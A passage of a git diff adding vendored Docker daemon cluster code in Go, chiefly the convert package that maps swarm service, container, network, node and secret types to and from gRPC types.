+func initClusterSpec(node *node, spec types.Spec) error { + ctx, _ := context.WithTimeout(context.Background(), 5*time.Second) + for conn := range node.ListenControlSocket(ctx) { + if ctx.Err() != nil { + return ctx.Err() + } + if conn != nil { + client := swarmapi.NewControlClient(conn) + var cluster *swarmapi.Cluster + for i := 0; ; i++ { + lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{}) + if err != nil { + return fmt.Errorf("error on listing clusters: %v", err) + } + if len(lcr.Clusters) == 0 { + if i < 10 { + time.Sleep(200 * time.Millisecond) + continue + } + return fmt.Errorf("empty list of clusters was returned") + } + cluster = lcr.Clusters[0] + break + } + // In init, we take the initial default values from swarmkit, and merge + // any non nil or 0 value from spec to GRPC spec. This will leave the + // default value alone. + // Note that this is different from Update(), as in Update() we expect + // user to specify the complete spec of the cluster (as they already know + // the existing one and knows which field to update) + clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + _, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{ + ClusterID: cluster.ID, + ClusterVersion: &cluster.Meta.Version, + Spec: &clusterSpec, + }) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + return nil + } + } + return ctx.Err() +} + +func detectLockedError(err error) error { + if err == swarmnode.ErrInvalidUnlockKey { + return errors.WithStack(ErrSwarmLocked) + } + return err +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go new file mode 100644 index 0000000000..10383f749b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go @@ -0,0 +1,235 @@ +package convert + 
+import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + container "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { + containerSpec := types.ContainerSpec{ + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + Hosts: c.Hosts, + Secrets: secretReferencesFromGRPC(c.Secrets), + } + + if c.DNSConfig != nil { + containerSpec.DNSConfig = &types.DNSConfig{ + Nameservers: c.DNSConfig.Nameservers, + Search: c.DNSConfig.Search, + Options: c.DNSConfig.Options, + } + } + + // Mounts + for _, m := range c.Mounts { + mount := mounttypes.Mount{ + Target: m.Target, + Source: m.Source, + Type: mounttypes.Type(strings.ToLower(swarmapi.Mount_MountType_name[int32(m.Type)])), + ReadOnly: m.ReadOnly, + } + + if m.BindOptions != nil { + mount.BindOptions = &mounttypes.BindOptions{ + Propagation: mounttypes.Propagation(strings.ToLower(swarmapi.Mount_BindOptions_MountPropagation_name[int32(m.BindOptions.Propagation)])), + } + } + + if m.VolumeOptions != nil { + mount.VolumeOptions = &mounttypes.VolumeOptions{ + NoCopy: m.VolumeOptions.NoCopy, + Labels: m.VolumeOptions.Labels, + } + if m.VolumeOptions.DriverConfig != nil { + mount.VolumeOptions.DriverConfig = &mounttypes.Driver{ + Name: m.VolumeOptions.DriverConfig.Name, + Options: m.VolumeOptions.DriverConfig.Options, + } + } + } + + if m.TmpfsOptions != nil { + mount.TmpfsOptions = &mounttypes.TmpfsOptions{ + SizeBytes: m.TmpfsOptions.SizeBytes, + Mode: m.TmpfsOptions.Mode, + } + } + containerSpec.Mounts = append(containerSpec.Mounts, mount) + } + + if c.StopGracePeriod != nil { + grace, _ := 
ptypes.Duration(c.StopGracePeriod) + containerSpec.StopGracePeriod = &grace + } + + if c.Healthcheck != nil { + containerSpec.Healthcheck = healthConfigFromGRPC(c.Healthcheck) + } + + return containerSpec +} + +func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretReference { + refs := make([]*swarmapi.SecretReference, 0, len(sr)) + for _, s := range sr { + ref := &swarmapi.SecretReference{ + SecretID: s.SecretID, + SecretName: s.SecretName, + } + if s.File != nil { + ref.Target = &swarmapi.SecretReference_File{ + File: &swarmapi.SecretReference_FileTarget{ + Name: s.File.Name, + UID: s.File.UID, + GID: s.File.GID, + Mode: s.File.Mode, + }, + } + } + + refs = append(refs, ref) + } + + return refs +} +func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretReference { + refs := make([]*types.SecretReference, 0, len(sr)) + for _, s := range sr { + target := s.GetFile() + if target == nil { + // not a file target + logrus.Warnf("secret target not a file: secret=%s", s.SecretID) + continue + } + refs = append(refs, &types.SecretReference{ + File: &types.SecretReferenceFileTarget{ + Name: target.Name, + UID: target.UID, + GID: target.GID, + Mode: target.Mode, + }, + SecretID: s.SecretID, + SecretName: s.SecretName, + }) + } + + return refs +} + +func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { + containerSpec := &swarmapi.ContainerSpec{ + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + Hosts: c.Hosts, + Secrets: secretReferencesToGRPC(c.Secrets), + } + + if c.DNSConfig != nil { + containerSpec.DNSConfig = &swarmapi.ContainerSpec_DNSConfig{ + Nameservers: c.DNSConfig.Nameservers, + Search: c.DNSConfig.Search, + Options: c.DNSConfig.Options, + } + } + + if c.StopGracePeriod != nil { + containerSpec.StopGracePeriod = 
ptypes.DurationProto(*c.StopGracePeriod) + } + + // Mounts + for _, m := range c.Mounts { + mount := swarmapi.Mount{ + Target: m.Target, + Source: m.Source, + ReadOnly: m.ReadOnly, + } + + if mountType, ok := swarmapi.Mount_MountType_value[strings.ToUpper(string(m.Type))]; ok { + mount.Type = swarmapi.Mount_MountType(mountType) + } else if string(m.Type) != "" { + return nil, fmt.Errorf("invalid MountType: %q", m.Type) + } + + if m.BindOptions != nil { + if mountPropagation, ok := swarmapi.Mount_BindOptions_MountPropagation_value[strings.ToUpper(string(m.BindOptions.Propagation))]; ok { + mount.BindOptions = &swarmapi.Mount_BindOptions{Propagation: swarmapi.Mount_BindOptions_MountPropagation(mountPropagation)} + } else if string(m.BindOptions.Propagation) != "" { + return nil, fmt.Errorf("invalid MountPropagation: %q", m.BindOptions.Propagation) + } + } + + if m.VolumeOptions != nil { + mount.VolumeOptions = &swarmapi.Mount_VolumeOptions{ + NoCopy: m.VolumeOptions.NoCopy, + Labels: m.VolumeOptions.Labels, + } + if m.VolumeOptions.DriverConfig != nil { + mount.VolumeOptions.DriverConfig = &swarmapi.Driver{ + Name: m.VolumeOptions.DriverConfig.Name, + Options: m.VolumeOptions.DriverConfig.Options, + } + } + } + + if m.TmpfsOptions != nil { + mount.TmpfsOptions = &swarmapi.Mount_TmpfsOptions{ + SizeBytes: m.TmpfsOptions.SizeBytes, + Mode: m.TmpfsOptions.Mode, + } + } + + containerSpec.Mounts = append(containerSpec.Mounts, mount) + } + + if c.Healthcheck != nil { + containerSpec.Healthcheck = healthConfigToGRPC(c.Healthcheck) + } + + return containerSpec, nil +} + +func healthConfigFromGRPC(h *swarmapi.HealthConfig) *container.HealthConfig { + interval, _ := ptypes.Duration(h.Interval) + timeout, _ := ptypes.Duration(h.Timeout) + return &container.HealthConfig{ + Test: h.Test, + Interval: interval, + Timeout: timeout, + Retries: int(h.Retries), + } +} + +func healthConfigToGRPC(h *container.HealthConfig) *swarmapi.HealthConfig { + return &swarmapi.HealthConfig{ + Test: 
h.Test, + Interval: ptypes.DurationProto(h.Interval), + Timeout: ptypes.DurationProto(h.Timeout), + Retries: int32(h.Retries), + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go new file mode 100644 index 0000000000..4d21b4df0a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go @@ -0,0 +1,210 @@ +package convert + +import ( + "strings" + + basictypes "github.com/docker/docker/api/types" + networktypes "github.com/docker/docker/api/types/network" + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +func networkAttachementFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment { + if na != nil { + return types.NetworkAttachment{ + Network: networkFromGRPC(na.Network), + Addresses: na.Addresses, + } + } + return types.NetworkAttachment{} +} + +func networkFromGRPC(n *swarmapi.Network) types.Network { + if n != nil { + network := types.Network{ + ID: n.ID, + Spec: types.NetworkSpec{ + IPv6Enabled: n.Spec.Ipv6Enabled, + Internal: n.Spec.Internal, + Attachable: n.Spec.Attachable, + IPAMOptions: ipamFromGRPC(n.Spec.IPAM), + }, + IPAMOptions: ipamFromGRPC(n.IPAM), + } + + // Meta + network.Version.Index = n.Meta.Version.Index + network.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) + network.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + + //Annotations + network.Spec.Name = n.Spec.Annotations.Name + network.Spec.Labels = n.Spec.Annotations.Labels + + //DriverConfiguration + if n.Spec.DriverConfig != nil { + network.Spec.DriverConfiguration = &types.Driver{ + Name: n.Spec.DriverConfig.Name, + Options: n.Spec.DriverConfig.Options, + } + } + + //DriverState + if n.DriverState != nil { + network.DriverState = types.Driver{ + Name: n.DriverState.Name, + Options: n.DriverState.Options, + } + } + + return network + } + return 
types.Network{} +} + +func ipamFromGRPC(i *swarmapi.IPAMOptions) *types.IPAMOptions { + var ipam *types.IPAMOptions + if i != nil { + ipam = &types.IPAMOptions{} + if i.Driver != nil { + ipam.Driver.Name = i.Driver.Name + ipam.Driver.Options = i.Driver.Options + } + + for _, config := range i.Configs { + ipam.Configs = append(ipam.Configs, types.IPAMConfig{ + Subnet: config.Subnet, + Range: config.Range, + Gateway: config.Gateway, + }) + } + } + return ipam +} + +func endpointSpecFromGRPC(es *swarmapi.EndpointSpec) *types.EndpointSpec { + var endpointSpec *types.EndpointSpec + if es != nil { + endpointSpec = &types.EndpointSpec{} + endpointSpec.Mode = types.ResolutionMode(strings.ToLower(es.Mode.String())) + + for _, portState := range es.Ports { + endpointSpec.Ports = append(endpointSpec.Ports, types.PortConfig{ + Name: portState.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), + TargetPort: portState.TargetPort, + PublishedPort: portState.PublishedPort, + }) + } + } + return endpointSpec +} + +func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint { + endpoint := types.Endpoint{} + if e != nil { + if espec := endpointSpecFromGRPC(e.Spec); espec != nil { + endpoint.Spec = *espec + } + + for _, portState := range e.Ports { + endpoint.Ports = append(endpoint.Ports, types.PortConfig{ + Name: portState.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), + TargetPort: portState.TargetPort, + PublishedPort: portState.PublishedPort, + }) + } + + for _, v := range e.VirtualIPs { + endpoint.VirtualIPs = append(endpoint.VirtualIPs, types.EndpointVirtualIP{ + NetworkID: 
v.NetworkID, + Addr: v.Addr}) + } + + } + + return endpoint +} + +// BasicNetworkFromGRPC converts a grpc Network to a NetworkResource. +func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource { + spec := n.Spec + var ipam networktypes.IPAM + if spec.IPAM != nil { + if spec.IPAM.Driver != nil { + ipam.Driver = spec.IPAM.Driver.Name + ipam.Options = spec.IPAM.Driver.Options + } + ipam.Config = make([]networktypes.IPAMConfig, 0, len(spec.IPAM.Configs)) + for _, ic := range spec.IPAM.Configs { + ipamConfig := networktypes.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + AuxAddress: ic.Reserved, + } + ipam.Config = append(ipam.Config, ipamConfig) + } + } + + nr := basictypes.NetworkResource{ + ID: n.ID, + Name: n.Spec.Annotations.Name, + Scope: "swarm", + EnableIPv6: spec.Ipv6Enabled, + IPAM: ipam, + Internal: spec.Internal, + Attachable: spec.Attachable, + Labels: n.Spec.Annotations.Labels, + } + + if n.DriverState != nil { + nr.Driver = n.DriverState.Name + nr.Options = n.DriverState.Options + } + + return nr +} + +// BasicNetworkCreateToGRPC converts a NetworkCreateRequest to a grpc NetworkSpec. 
+func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.NetworkSpec { + ns := swarmapi.NetworkSpec{ + Annotations: swarmapi.Annotations{ + Name: create.Name, + Labels: create.Labels, + }, + DriverConfig: &swarmapi.Driver{ + Name: create.Driver, + Options: create.Options, + }, + Ipv6Enabled: create.EnableIPv6, + Internal: create.Internal, + Attachable: create.Attachable, + } + if create.IPAM != nil { + driver := create.IPAM.Driver + if driver == "" { + driver = "default" + } + ns.IPAM = &swarmapi.IPAMOptions{ + Driver: &swarmapi.Driver{ + Name: driver, + Options: create.IPAM.Options, + }, + } + ipamSpec := make([]*swarmapi.IPAMConfig, 0, len(create.IPAM.Config)) + for _, ipamConfig := range create.IPAM.Config { + ipamSpec = append(ipamSpec, &swarmapi.IPAMConfig{ + Subnet: ipamConfig.Subnet, + Range: ipamConfig.IPRange, + Gateway: ipamConfig.Gateway, + }) + } + ns.IPAM.Configs = ipamSpec + } + return ns +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go new file mode 100644 index 0000000000..306f34e0b2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go @@ -0,0 +1,89 @@ +package convert + +import ( + "fmt" + "strings" + + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// NodeFromGRPC converts a grpc Node to a Node. 
+func NodeFromGRPC(n swarmapi.Node) types.Node { + node := types.Node{ + ID: n.ID, + Spec: types.NodeSpec{ + Role: types.NodeRole(strings.ToLower(n.Spec.Role.String())), + Availability: types.NodeAvailability(strings.ToLower(n.Spec.Availability.String())), + }, + Status: types.NodeStatus{ + State: types.NodeState(strings.ToLower(n.Status.State.String())), + Message: n.Status.Message, + Addr: n.Status.Addr, + }, + } + + // Meta + node.Version.Index = n.Meta.Version.Index + node.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) + node.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + + //Annotations + node.Spec.Name = n.Spec.Annotations.Name + node.Spec.Labels = n.Spec.Annotations.Labels + + //Description + if n.Description != nil { + node.Description.Hostname = n.Description.Hostname + if n.Description.Platform != nil { + node.Description.Platform.Architecture = n.Description.Platform.Architecture + node.Description.Platform.OS = n.Description.Platform.OS + } + if n.Description.Resources != nil { + node.Description.Resources.NanoCPUs = n.Description.Resources.NanoCPUs + node.Description.Resources.MemoryBytes = n.Description.Resources.MemoryBytes + } + if n.Description.Engine != nil { + node.Description.Engine.EngineVersion = n.Description.Engine.EngineVersion + node.Description.Engine.Labels = n.Description.Engine.Labels + for _, plugin := range n.Description.Engine.Plugins { + node.Description.Engine.Plugins = append(node.Description.Engine.Plugins, types.PluginDescription{Type: plugin.Type, Name: plugin.Name}) + } + } + } + + //Manager + if n.ManagerStatus != nil { + node.ManagerStatus = &types.ManagerStatus{ + Leader: n.ManagerStatus.Leader, + Reachability: types.Reachability(strings.ToLower(n.ManagerStatus.Reachability.String())), + Addr: n.ManagerStatus.Addr, + } + } + + return node +} + +// NodeSpecToGRPC converts a NodeSpec to a grpc NodeSpec. 
+func NodeSpecToGRPC(s types.NodeSpec) (swarmapi.NodeSpec, error) { + spec := swarmapi.NodeSpec{ + Annotations: swarmapi.Annotations{ + Name: s.Name, + Labels: s.Labels, + }, + } + if role, ok := swarmapi.NodeRole_value[strings.ToUpper(string(s.Role))]; ok { + spec.Role = swarmapi.NodeRole(role) + } else { + return swarmapi.NodeSpec{}, fmt.Errorf("invalid Role: %q", s.Role) + } + + if availability, ok := swarmapi.NodeSpec_Availability_value[strings.ToUpper(string(s.Availability))]; ok { + spec.Availability = swarmapi.NodeSpec_Availability(availability) + } else { + return swarmapi.NodeSpec{}, fmt.Errorf("invalid Availability: %q", s.Availability) + } + + return spec, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go new file mode 100644 index 0000000000..3e966873f4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go @@ -0,0 +1,64 @@ +package convert + +import ( + swarmtypes "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// SecretFromGRPC converts a grpc Secret to a Secret. +func SecretFromGRPC(s *swarmapi.Secret) swarmtypes.Secret { + secret := swarmtypes.Secret{ + ID: s.ID, + Spec: swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: s.Spec.Annotations.Name, + Labels: s.Spec.Annotations.Labels, + }, + Data: s.Spec.Data, + }, + } + + secret.Version.Index = s.Meta.Version.Index + // Meta + secret.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) + secret.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + + return secret +} + +// SecretSpecToGRPC converts Secret to a grpc Secret. 
+func SecretSpecToGRPC(s swarmtypes.SecretSpec) swarmapi.SecretSpec { + return swarmapi.SecretSpec{ + Annotations: swarmapi.Annotations{ + Name: s.Name, + Labels: s.Labels, + }, + Data: s.Data, + } +} + +// SecretReferencesFromGRPC converts a slice of grpc SecretReference to SecretReference +func SecretReferencesFromGRPC(s []*swarmapi.SecretReference) []*swarmtypes.SecretReference { + refs := []*swarmtypes.SecretReference{} + + for _, r := range s { + ref := &swarmtypes.SecretReference{ + SecretID: r.SecretID, + SecretName: r.SecretName, + } + + if t, ok := r.Target.(*swarmapi.SecretReference_File); ok { + ref.File = &swarmtypes.SecretReferenceFileTarget{ + Name: t.File.Name, + UID: t.File.UID, + GID: t.File.GID, + Mode: t.File.Mode, + } + } + + refs = append(refs, ref) + } + + return refs +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go new file mode 100644 index 0000000000..aa68e01f44 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go @@ -0,0 +1,366 @@ +package convert + +import ( + "fmt" + "strings" + + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/namesgenerator" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// ServiceFromGRPC converts a grpc Service to a Service. 
+func ServiceFromGRPC(s swarmapi.Service) types.Service { + service := types.Service{ + ID: s.ID, + Spec: *serviceSpecFromGRPC(&s.Spec), + PreviousSpec: serviceSpecFromGRPC(s.PreviousSpec), + + Endpoint: endpointFromGRPC(s.Endpoint), + } + + // Meta + service.Version.Index = s.Meta.Version.Index + service.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) + service.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + + // UpdateStatus + service.UpdateStatus = types.UpdateStatus{} + if s.UpdateStatus != nil { + switch s.UpdateStatus.State { + case swarmapi.UpdateStatus_UPDATING: + service.UpdateStatus.State = types.UpdateStateUpdating + case swarmapi.UpdateStatus_PAUSED: + service.UpdateStatus.State = types.UpdateStatePaused + case swarmapi.UpdateStatus_COMPLETED: + service.UpdateStatus.State = types.UpdateStateCompleted + } + + service.UpdateStatus.StartedAt, _ = ptypes.Timestamp(s.UpdateStatus.StartedAt) + service.UpdateStatus.CompletedAt, _ = ptypes.Timestamp(s.UpdateStatus.CompletedAt) + service.UpdateStatus.Message = s.UpdateStatus.Message + } + + return service +} + +func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec { + if spec == nil { + return nil + } + + serviceNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Networks)) + for _, n := range spec.Networks { + serviceNetworks = append(serviceNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Task.Networks)) + for _, n := range spec.Task.Networks { + taskNetworks = append(taskNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + containerConfig := spec.Task.Runtime.(*swarmapi.TaskSpec_Container).Container + convertedSpec := &types.ServiceSpec{ + Annotations: types.Annotations{ + Name: spec.Annotations.Name, + Labels: spec.Annotations.Labels, + }, + + TaskTemplate: types.TaskSpec{ + ContainerSpec: containerSpecFromGRPC(containerConfig), + 
Resources: resourcesFromGRPC(spec.Task.Resources), + RestartPolicy: restartPolicyFromGRPC(spec.Task.Restart), + Placement: placementFromGRPC(spec.Task.Placement), + LogDriver: driverFromGRPC(spec.Task.LogDriver), + Networks: taskNetworks, + ForceUpdate: spec.Task.ForceUpdate, + }, + + Networks: serviceNetworks, + EndpointSpec: endpointSpecFromGRPC(spec.Endpoint), + } + + // UpdateConfig + if spec.Update != nil { + convertedSpec.UpdateConfig = &types.UpdateConfig{ + Parallelism: spec.Update.Parallelism, + MaxFailureRatio: spec.Update.MaxFailureRatio, + } + + convertedSpec.UpdateConfig.Delay, _ = ptypes.Duration(&spec.Update.Delay) + if spec.Update.Monitor != nil { + convertedSpec.UpdateConfig.Monitor, _ = ptypes.Duration(spec.Update.Monitor) + } + + switch spec.Update.FailureAction { + case swarmapi.UpdateConfig_PAUSE: + convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionPause + case swarmapi.UpdateConfig_CONTINUE: + convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionContinue + } + } + + // Mode + switch t := spec.GetMode().(type) { + case *swarmapi.ServiceSpec_Global: + convertedSpec.Mode.Global = &types.GlobalService{} + case *swarmapi.ServiceSpec_Replicated: + convertedSpec.Mode.Replicated = &types.ReplicatedService{ + Replicas: &t.Replicated.Replicas, + } + } + + return convertedSpec +} + +// ServiceSpecToGRPC converts a ServiceSpec to a grpc ServiceSpec. 
+func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { + name := s.Name + if name == "" { + name = namesgenerator.GetRandomName(0) + } + + serviceNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.Networks)) + for _, n := range s.Networks { + serviceNetworks = append(serviceNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + taskNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.TaskTemplate.Networks)) + for _, n := range s.TaskTemplate.Networks { + taskNetworks = append(taskNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + spec := swarmapi.ServiceSpec{ + Annotations: swarmapi.Annotations{ + Name: name, + Labels: s.Labels, + }, + Task: swarmapi.TaskSpec{ + Resources: resourcesToGRPC(s.TaskTemplate.Resources), + LogDriver: driverToGRPC(s.TaskTemplate.LogDriver), + Networks: taskNetworks, + ForceUpdate: s.TaskTemplate.ForceUpdate, + }, + Networks: serviceNetworks, + } + + containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec} + + restartPolicy, err := restartPolicyToGRPC(s.TaskTemplate.RestartPolicy) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Restart = restartPolicy + + if s.TaskTemplate.Placement != nil { + spec.Task.Placement = &swarmapi.Placement{ + Constraints: s.TaskTemplate.Placement.Constraints, + } + } + + if s.UpdateConfig != nil { + var failureAction swarmapi.UpdateConfig_FailureAction + switch s.UpdateConfig.FailureAction { + case types.UpdateFailureActionPause, "": + failureAction = swarmapi.UpdateConfig_PAUSE + case types.UpdateFailureActionContinue: + failureAction = swarmapi.UpdateConfig_CONTINUE + default: + return swarmapi.ServiceSpec{}, fmt.Errorf("unrecongized update failure action %s", s.UpdateConfig.FailureAction) + } + spec.Update = 
&swarmapi.UpdateConfig{ + Parallelism: s.UpdateConfig.Parallelism, + Delay: *ptypes.DurationProto(s.UpdateConfig.Delay), + FailureAction: failureAction, + MaxFailureRatio: s.UpdateConfig.MaxFailureRatio, + } + if s.UpdateConfig.Monitor != 0 { + spec.Update.Monitor = ptypes.DurationProto(s.UpdateConfig.Monitor) + } + } + + if s.EndpointSpec != nil { + if s.EndpointSpec.Mode != "" && + s.EndpointSpec.Mode != types.ResolutionModeVIP && + s.EndpointSpec.Mode != types.ResolutionModeDNSRR { + return swarmapi.ServiceSpec{}, fmt.Errorf("invalid resolution mode: %q", s.EndpointSpec.Mode) + } + + spec.Endpoint = &swarmapi.EndpointSpec{} + + spec.Endpoint.Mode = swarmapi.EndpointSpec_ResolutionMode(swarmapi.EndpointSpec_ResolutionMode_value[strings.ToUpper(string(s.EndpointSpec.Mode))]) + + for _, portConfig := range s.EndpointSpec.Ports { + spec.Endpoint.Ports = append(spec.Endpoint.Ports, &swarmapi.PortConfig{ + Name: portConfig.Name, + Protocol: swarmapi.PortConfig_Protocol(swarmapi.PortConfig_Protocol_value[strings.ToUpper(string(portConfig.Protocol))]), + PublishMode: swarmapi.PortConfig_PublishMode(swarmapi.PortConfig_PublishMode_value[strings.ToUpper(string(portConfig.PublishMode))]), + TargetPort: portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + }) + } + } + + // Mode + if s.Mode.Global != nil && s.Mode.Replicated != nil { + return swarmapi.ServiceSpec{}, fmt.Errorf("cannot specify both replicated mode and global mode") + } + + if s.Mode.Global != nil { + spec.Mode = &swarmapi.ServiceSpec_Global{ + Global: &swarmapi.GlobalService{}, + } + } else if s.Mode.Replicated != nil && s.Mode.Replicated.Replicas != nil { + spec.Mode = &swarmapi.ServiceSpec_Replicated{ + Replicated: &swarmapi.ReplicatedService{Replicas: *s.Mode.Replicated.Replicas}, + } + } else { + spec.Mode = &swarmapi.ServiceSpec_Replicated{ + Replicated: &swarmapi.ReplicatedService{Replicas: 1}, + } + } + + return spec, nil +} + +func resourcesFromGRPC(res *swarmapi.ResourceRequirements) 
*types.ResourceRequirements { + var resources *types.ResourceRequirements + if res != nil { + resources = &types.ResourceRequirements{} + if res.Limits != nil { + resources.Limits = &types.Resources{ + NanoCPUs: res.Limits.NanoCPUs, + MemoryBytes: res.Limits.MemoryBytes, + } + } + if res.Reservations != nil { + resources.Reservations = &types.Resources{ + NanoCPUs: res.Reservations.NanoCPUs, + MemoryBytes: res.Reservations.MemoryBytes, + } + } + } + + return resources +} + +func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirements { + var reqs *swarmapi.ResourceRequirements + if res != nil { + reqs = &swarmapi.ResourceRequirements{} + if res.Limits != nil { + reqs.Limits = &swarmapi.Resources{ + NanoCPUs: res.Limits.NanoCPUs, + MemoryBytes: res.Limits.MemoryBytes, + } + } + if res.Reservations != nil { + reqs.Reservations = &swarmapi.Resources{ + NanoCPUs: res.Reservations.NanoCPUs, + MemoryBytes: res.Reservations.MemoryBytes, + } + + } + } + return reqs +} + +func restartPolicyFromGRPC(p *swarmapi.RestartPolicy) *types.RestartPolicy { + var rp *types.RestartPolicy + if p != nil { + rp = &types.RestartPolicy{} + + switch p.Condition { + case swarmapi.RestartOnNone: + rp.Condition = types.RestartPolicyConditionNone + case swarmapi.RestartOnFailure: + rp.Condition = types.RestartPolicyConditionOnFailure + case swarmapi.RestartOnAny: + rp.Condition = types.RestartPolicyConditionAny + default: + rp.Condition = types.RestartPolicyConditionAny + } + + if p.Delay != nil { + delay, _ := ptypes.Duration(p.Delay) + rp.Delay = &delay + } + if p.Window != nil { + window, _ := ptypes.Duration(p.Window) + rp.Window = &window + } + + rp.MaxAttempts = &p.MaxAttempts + } + return rp +} + +func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error) { + var rp *swarmapi.RestartPolicy + if p != nil { + rp = &swarmapi.RestartPolicy{} + + switch p.Condition { + case types.RestartPolicyConditionNone: + rp.Condition = swarmapi.RestartOnNone 
+ case types.RestartPolicyConditionOnFailure: + rp.Condition = swarmapi.RestartOnFailure + case types.RestartPolicyConditionAny: + rp.Condition = swarmapi.RestartOnAny + default: + if string(p.Condition) != "" { + return nil, fmt.Errorf("invalid RestartCondition: %q", p.Condition) + } + rp.Condition = swarmapi.RestartOnAny + } + + if p.Delay != nil { + rp.Delay = ptypes.DurationProto(*p.Delay) + } + if p.Window != nil { + rp.Window = ptypes.DurationProto(*p.Window) + } + if p.MaxAttempts != nil { + rp.MaxAttempts = *p.MaxAttempts + + } + } + return rp, nil +} + +func placementFromGRPC(p *swarmapi.Placement) *types.Placement { + var r *types.Placement + if p != nil { + r = &types.Placement{} + r.Constraints = p.Constraints + } + + return r +} + +func driverFromGRPC(p *swarmapi.Driver) *types.Driver { + if p == nil { + return nil + } + + return &types.Driver{ + Name: p.Name, + Options: p.Options, + } +} + +func driverToGRPC(p *types.Driver) *swarmapi.Driver { + if p == nil { + return nil + } + + return &swarmapi.Driver{ + Name: p.Name, + Options: p.Options, + } +} diff --git 